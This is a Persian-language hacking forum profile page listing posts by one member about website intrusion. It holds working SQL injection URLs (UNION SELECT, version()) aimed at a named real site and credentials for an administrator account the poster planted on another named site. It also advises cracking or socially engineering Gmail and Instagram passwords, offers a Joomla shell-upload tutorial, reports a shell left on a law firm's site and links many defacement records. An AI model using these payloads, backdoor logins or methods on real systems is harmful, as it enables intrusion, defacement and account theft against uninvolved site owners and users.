
-
تعداد ارسال ها
158 -
تاریخ عضویت
-
آخرین بازدید
-
روز های برد
3
آخرین بار برد k.shadow در 14 شهریور 1395
k.shadow یکی از رکورد داران بیشترین تعداد پسند مطالب است !
درباره k.shadow

-
درجه
- تاریخ تولد 2 بهمن 1373
اطلاعات فردی
-
محل سکونت
::::::iran::::::::
-
جنسیت
آقا
-
-
-
johnjones به یک ارسال در یک موضوع واکنش نشان داد : دیفیس های ثبت شده در aljyyosh.org , zone-deface.com
-
johnjones به یک ارسال در یک موضوع واکنش نشان داد : دیفیس های ثبت شده در aljyyosh.org , zone-deface.com
-
johnjones به یک ارسال در یک موضوع واکنش نشان داد : دیفیس های ثبت شده در aljyyosh.org , zone-deface.com
-
-
-
johnjones به یک ارسال در یک موضوع واکنش نشان داد : سایتهای هک شده توسط تیم امنیتی گارد ایران - Guardiran Security Team
-
johnjones به یک ارسال در یک موضوع واکنش نشان داد : سایتهای هک شده توسط تیم امنیتی گارد ایران - Guardiran Security Team
-
SeniorSpirit شروع به دنبال کردن k.shadow کرد
-
-
-
-
-
-
-
-
-
به نام خدا سلام و درود خدمت تمامی عزیزان گارد ایران مدتی هست که دوستان در گارد ایران در مورد باگ های امنیتی چه در انجمن و چه در تلگرام از من سوال میپرسن خوب تصمیم گرفتم این تاپیک رو ایجاد کنم در جواب به اینگونه دوستان باید بگم بله باگ بسیار هست خوب امروز این مبحث رو کاملا گسترش و توضیح میدیم تعریف باگ رو که میدونید پس میریم سراغ بقیه موضوع کلا باگ های امنیتی به دوبخش کلی تقسیم میشن 1- باگ های ریشه 2- باگ هایی که از باگ های ریشه ساخته میشن باگ های ریشه که میدونید شامل sql injection xss csrf lfi rfi rfu rce bof میشن وبرای مثال باگ bypass admin page از باگ sql injection ساخته شده پس باید شما به باگ های ریشه تسلط داشته باشید و بعد از این میرسیم به جواب دوستان باگ هایی که میایم باهش سایت هک میکنیم هم به دوبخش تقسیم میشه 1- باگ وب اپلیکیشن: این نوع باگ در اثر اشتباهات برنامه نویسان به وجود میاد و در صفحات وب ما اون هارو مشاهده میکنیم و میتونیم با اون ها به سایت نفوذ کنیم و.... مانند باگ sql injection 2- باگ های سمت سرور : در اثر اشتباهات برنامه نویسان سیستم عامل روی سرور یا فایروال های سرور و ... به وجود میاد و سطحشون از باگ های وب اپلیکیشن بسیار بالاتر هست چون همونطور که میدونید اگه ما توسط یک باگ وب اپلیکیشن شل بریزیم بعد باید تلاش بسیاری در بایپس مود های امنیتی (دیسیبل فانکشن و سیف مود و روت شدن به سرور و .... )کنیم ولی باگ های سمت سرور کلا دسترسی بالایی از سرور به ما میدن حتی در حد روت خوب باگ های وب اپلیکیشن مخصوص باگ های ریشه نو نت اموزش رایگان فراوون هست و احتیاجی به دونستن کامل اصول شبکه و طرز کار cpu , hard , memory و ..... نداره ولی در باگ های سمت سرور مثلا buffer over flow احتیاج به دونستن دانش از طرز کار سی پیو هست مخصوصا ثبات های سی پیو هست و برای اکسپلوییت کردن احتیاج با دانستن زبان c در حد کم و یکک زبان برنامه نویسی (من خودم python یاد گرفتم :دی) هست باگ های سمت سرور بسیار هستن در حدی که بعضی از هکران اقدام به قرار دادن اکسپلوییت های اونا در سطح وب نمیکنن برای مثال باگ mysql sintacks over flow تا همین سال پیش رایگان در دسترس همه قرار نمیگرفت امید وارم مورد توجه دوستان قرار گرفته باشه اگه دوستان مایل بودن اموزش بافر اور فلو رو بزارم تو خصوصی به من پیام بدن اشتباهات تایپی رو هم به بزرگی خودتون ببخشید پیروز باشید
-
- باگ
- باگ های مختلف
- (و 12 مورد دیگر)
-
دانلود پسورد لیست برای کرک - پسورد لیست برای Crack - هک با Password list
k.shadow پاسخی برای kingdeface در یک موضوع ارسال کرد در پسورد لیست و کمبو لیست
درود ببینید خطای پرمیژن رو وقتی میده که از یوزر روت استفاده نکنید ولی منم با این خطا حتی با یوزر روت مواجه شدم اول دستورتون بزنید sudo به معنای : super user do هست راهنمایی : دقت کنید پسورد لیست شما به 1 ترابایت فضا نیاز داره کرک اصلا راه جالبی نیست هم زمانبر هست روی پسورد های 11 رقمی هم فضا نیاز داره و حداقل دو هفته باید کامپیوترتون روشن باشه یا از vps استفاده کنید یا اگر میخواید جیمیل و اینستاو ... رمزشو بفهمید در نظر داشته باشید که اونا فکر همه جاشو کردن و به یک پروکسی لیست عظیم هم نیاز دارید جیمیل هر 5 دقیقه حداقل صد تا پروکسی میسوزونه مهندسی اجتماعی بهترین راهه (منظور از مهندسی اجتماعی فقط فیک پیج و گول زدن و..... اینا نیست من حتی سایت هم با مهندسی اجتماعی هک کردم )- 55 پاسخ
-
- پسورد لیست قوی
- دانلود کاملPassword list
- (و 8 مورد دیگر)
-
http://www.drmkumarparamedical.com/gallery/1.php درود cms کلا باگ داره قبلا دیفیس شده ولی در هر صورت من یوزر ساختم روش بجای vps میتونید استفاده کنین یوزر:admin پسورد :123 نوع یوزر : administrator پورت 3389 باز نیست یکم نیاز به خلاقیت داره سرعتشم برای کرک خیلی خوبه
-
درود دوست عزیز اقای Mr_007 ببینید 1 اینجا تارگت های sql باید قرار بگیره نه اپلودر 2 لطفا از انجمن های دیگه کپی نکنید تارگت هارو یا اگر کپی میکنید با ذکر منبع لطفا گزارش شد تو اولین فرصت مدیران بررسی میکنند برای اینکه اسپم نشه http://mychiptime.com/searchevent.php?id=9259%27+order+by+36--%20- http://mychiptime.com/searchevent.php?id=.9259'+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36-- - http://mychiptime.com/searchevent.php?id=.9259%27+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--%20- بقیش با خودتون
- 504 پاسخ
-
- تارگت
- target for sql
-
(و 6 مورد دیگر)
برچسب زده شده با :
-
تاپیک جامع آموزش آپلود شل
k.shadow پاسخی برای DeMoN در یک موضوع ارسال کرد در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
درود دوستان درخواست کرده بودند که اموزش اپلود شل روی جوملا 2/5 رو اموزش بدیم چون همونطور که میدونید رو این ورژن نمیشه قالب ادیت کرد و نمیشه تنظیمات رو دستکاری کرد خوب یک روش کاملا priv8 که توسط خود اعضای گارد ایران ابداع شده (J.ALL_EdiT0r,1TED,reza.attacker) قرار شد اموزش بدم اگه استقبال خوب باشه اموزش اپلود شل روی جوملا 3.4 رو هم میدم و وردپرس زمانی که سیف مود on هست و دسترسی ادیت نداریم یا cms هایی که دوستان درخواست کنن بررسی میشه اگه تونستیم شل بزنیم اموزش قرار میدیم امید وارم لذت ببرید jomla.part1.rar jomla.part2.rar jomla.part3.rar- 8 پاسخ
-
- تاپیک جامع آموزش آپلود شل
- آپلود شل با live http header
-
(و 14 مورد دیگر)
برچسب زده شده با :
- تاپیک جامع آموزش آپلود شل
- آپلود شل با live http header
- آپلود شل با تمپر دیتا
- آموزش آپلود شل با افزونه
- shell uploading
- آموزش آپلود شل
- آموزش آپلود شل در سایت
- آموزش آپلود شل هک سایت
- آپلود شل
- آموزش هک سایت
- آموزش آپلود شل در پنل وردپرس
- آموزش آپلود شل در پنل جوملا
- آموزش هک سایت وردپرس
- آموزش هک سایت جوملا
- آموزش آپلود شل دیفیس سایت
- آموزش دیفیس سایت
-
دیفیس های ثبت شده در aljyyosh.org , zone-deface.com
k.shadow پاسخی برای kingdeface در یک موضوع ارسال کرد در قوانین و اطلاعیه های سایت
درود دوست عزیز حالا چرا سایت z0n3 این همه سایت ثبت دیفیس داریم که اسم با کارکتز بالارو قبول میکنه http://hack-mirror.com/ zone-deface.com پیروز باشید برای اینکه اسپم نشه http://aljyyosh.org/mirror.php?id=180643 http://aljyyosh.org/mirror.php?id=180642 http://aljyyosh.org/mirror.php?id=180641 http://aljyyosh.org/mirror.php?id=180640 -
دیفیس های ثبت شده در aljyyosh.org , zone-deface.com
k.shadow پاسخی برای kingdeface در یک موضوع ارسال کرد در قوانین و اطلاعیه های سایت
http://aljyyosh.org/mirror.php?id=180507 -
درود شل از طریق cpanel اپلود شده http://confortoadvogados.com.br/ اگه کسی تونست پاکش کنه :دی
- 181 پاسخ
-
- آپلود شل shell
- شل آماده برای تمرین
- (و 8 مورد دیگر)
-
دیفیس های ثبت شده در aljyyosh.org , zone-deface.com
k.shadow پاسخی برای kingdeface در یک موضوع ارسال کرد در قوانین و اطلاعیه های سایت
بعد از چند وقت با باگ mysql over flow یا همون sintacks over flow سایت هک کردیم که اونم مثل اینکه قبلا تو زون ثبت شده بود یک سایت دیگه هم رو سرورش هک کردم :دی بهپوشه اصلی دسترسی نداشتم http://aljyyosh.org/mirror.php?id=180133 http://aljyyosh.org/mirror.php?id=180134 بقیه سایتاش رو هم بررسی میکنم البته دیگه خورد تو ذوقم شل رو تو تاپیک شل اماده جهت تمرین میزارم سیف مود و دیسیبل فانک نداره -
دیفیس های ثبت شده در aljyyosh.org , zone-deface.com
k.shadow پاسخی برای kingdeface در یک موضوع ارسال کرد در قوانین و اطلاعیه های سایت
http://aljyyosh.org/mirror.php?id=179289 http://aljyyosh.org/mirror.php?id=179041 -
k.shadow شروع به دنبال کردن saeedzamanian کرد
-
saeedzamanian شروع به دنبال کردن k.shadow کرد
-
سایتهای هک شده توسط تیم امنیتی گارد ایران - Guardiran Security Team
k.shadow پاسخی برای kingdeface در یک موضوع ارسال کرد در قوانین و اطلاعیه های سایت
http://zone-h.org/mirror/id/26715043- 1,142 پاسخ
-
- تیم امنیتی گارد ایران
- نفوذ به سایتها
- (و 4 مورد دیگر)
-
دیفیس های ثبت شده در aljyyosh.org , zone-deface.com
k.shadow پاسخی برای kingdeface در یک موضوع ارسال کرد در قوانین و اطلاعیه های سایت
spc tnx :Reza.Attacker mass defensed قبلا تو زون ثبت شده بود جالبه!!! http://aljyyosh.org/mirror.php?id=179322 http://aljyyosh.org/mirror.php?id=179320 http://aljyyosh.org/mirror.php?id=179319 http://aljyyosh.org/mirror.php?id=179318 http://aljyyosh.org/mirror.php?id=179314 http://aljyyosh.org/mirror.php?id=179313 http://aljyyosh.org/mirror.php?id=179312 http://aljyyosh.org/mirror.php?id=179317 http://aljyyosh.org/mirror.php?id=179316 http://aljyyosh.org/mirror.php?id=179315 http://aljyyosh.org/mirror.php?id=179311 http://aljyyosh.org/mirror.php?id=179310 http://aljyyosh.org/mirror.php?id=179309 http://aljyyosh.org/mirror.php?id=179308 http://aljyyosh.org/mirror.php?id=179307 -
دیفیس های ثبت شده در aljyyosh.org , zone-deface.com
k.shadow پاسخی برای kingdeface در یک موضوع ارسال کرد در قوانین و اطلاعیه های سایت
http://aljyyosh.org/mirror.php?id=179001